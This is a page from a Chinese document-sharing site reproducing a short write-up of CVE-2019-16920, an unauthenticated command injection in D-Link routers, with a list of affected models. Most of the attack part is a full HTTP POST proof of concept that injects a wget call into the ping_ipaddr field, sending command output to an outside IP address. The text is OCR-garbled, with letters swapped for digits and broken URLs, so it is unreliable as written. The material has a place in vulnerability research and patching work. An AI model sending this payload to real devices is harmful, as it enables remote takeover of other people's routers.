(CVE-2019-16920)D-Link rce.docx

上传人:lao****ou 文档编号:794876 上传时间:2024-05-25 格式:DOCX 页数:1 大小:13.89KB
下载 相关 举报
(CVE-2019-16920)D-Link rce.docx_第1页
第1页 / 共1页
亲,该文档总共1页,全部预览完了,如果喜欢就下载吧!
资源描述

《(CVE-2019-16920)D-Link rce.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-16920)D-Link rce.docx(1页珍藏版)》请在第一文库网上搜索。

1、(CVE-2019-16920)D-1inkrce一、漏洞简介D-1ink设备中出现未经身份验证的命令注入漏洞(FG-VD-19-117CVE201916920),该漏洞可造成远程代码执行。二、漏洞影响DIR-655,DIR-8661,DIR-652,DHP-1565,DIR-8551,DAP-1533,DIR-8621,DIR-615,DIR-835,DIR-825等三、复现过程poc攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命令注入。POST/app1y_sec.cgiHTTP/1.1Host:192.168.232.128User-Agent:Mozi11a

2、/5.0(Macintosh;Inte1MacOSX10.14;rv:69.0)Gecko20100101Firefox/69.0Accept:texthtm1,app1icationxhtm1+xm1japp1icationxm1jq=0.9,*jq=0.8Accept-1anguage:vi-VN,vijq=0.8,en-US;q=0.5,enjq=0.3Accept-Encoding:gzip,def1ateContent-Type:app1ication/X-WWW-form-urIencodedContent-1ength:131Connection:c1oseReferer:htt

3、p:/192.168.232.128/1ogin_pic.aspCookie:uid=1234123Upgrade-Insecure-Requests:1htm1_response_page=1ogin_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awgt%20-P%25tmp%20ht3p:/45.76.148.31:4321/?$(echo1234)“该漏洞始于一次错误的身份验证过程。当我们要进入管理页面时,需要执行登录操作。此时,我们会对app1y_sec.cgi页面发出POST请求,其中包含一个操作ping_testo研究后发现,我们可通过参数Ping_ipaddr执行命令注入。虽然响应是返向登录页面,但操作Ping1eSt仍然执行了,我们通过参数ping_ipaddr注入的命令echo1234成功执行,并将结果发送回我们的服务器。”image

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 应用文档 > 工作总结

copyright@ 2008-2022 001doc.com网站版权所有   

经营许可证编号:宁ICP备2022001085号

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



客服